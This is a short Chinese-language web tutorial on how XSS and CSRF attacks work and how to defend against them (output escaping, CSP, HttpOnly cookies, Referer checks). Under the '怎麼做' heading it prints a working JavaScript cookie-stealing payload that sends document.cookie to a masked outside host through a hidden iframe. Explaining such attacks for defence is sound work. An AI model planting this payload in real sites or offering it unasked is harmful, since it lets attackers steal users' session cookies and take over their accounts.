XSS和CSRF攻擊怎麼防護

XSS：跨站腳本（Cross-site scripting，通常簡稱為XSS）是一種網站應用程式的安全漏洞攻擊，是程式碼注入的一種。它允許惡意用戶將程式碼注入到網頁上，其他用戶在觀看網頁時就會受到影響。這類攻擊通常包含了HTML以及使用者端腳本語言。

CSRF:跨站請求偽造（英文：Cross-site request forgery），也被稱為one-click attack 或session riding，通常縮寫為CSRF 或XSRF， 是一種挾制用戶在目前已登入的Web應用程式上執行非本意的操作的攻擊方法。

簡單理解就是：

XSS： 透過客戶端腳本語言（最常見如：JavaScript）
在一個論壇發文中發布一段惡意的JavaScript程式碼就是腳本注入，如果這個程式碼內容有請求外部伺服器，那麼就叫做XSS！

CSRF：又稱XSRF，冒充用戶發起請求（在用戶不知情的情況下）,完成一些違背用戶意願的請求（如惡意發帖，刪帖，改密碼，發郵件等）。

怎麼做

// 用 <script type="text/javascript"></script> 包起来放在评论中
(function(window, document) {
    // 构造泄露信息用的 URL
    var cookies = document.cookie;
    var xssURIBase = "http://********";
    var xssURI = xssURIBase + window.encodeURI(cookies);
    // 建立隐藏 iframe 用于通讯
    var hideFrame = document.createElement("iframe");
    hideFrame.height = 0;
    hideFrame.width = 0;
    hideFrame.style.display = "none";
    hideFrame.src = xssURI;
    // 开工
    document.body.appendChild(hideFrame);
})(window, document);

如何防護

中心思想：一切的一切外部來源數據，都要我們服務端程式碼的過濾，才能讓他展示到頁面上，也就是說，一切外部資料都是非法的，而且一定要做好過濾。

1.盡量使用innerText(IE)和textContent(Firefox),也就是jQuery的text()來輸出文字內容
2.必須要用innerHTML等等函數，則需要做類似php的htmlspecialchars的過濾

3.在輸出html時，加上Content Security Policy的Http Header
（作用：可以防止頁面被XSS攻擊時，嵌入第三方的腳本檔案等）
（缺陷：IE或低版本的瀏覽器可能不支援）
4.在設定Cookie時，加上HttpOnly參數
（作用：可防止頁面被XSS攻擊時，Cookie資訊被盜取，可相容至IE6）
（缺陷：網站本身的JS程式碼也無法操作Cookie，而且作用有限，只能保證Cookie的安全）
5.在開發API時，檢驗請求的Referer參數
（作用：可以在一定程度上防止CSRF攻擊）
（缺陷：IE或低版本的瀏覽器中，Referer參數可以被偽造）

相關建議：

PHP實作防止跨站和xss攻擊實例代碼

#JS寫XSS cookie stealer來竊取密碼方法

XSS及CSRF的詳細介紹

以上是XSS和CSRF攻擊怎麼防護的詳細內容。更多資訊請關注PHP中文網其他相關文章！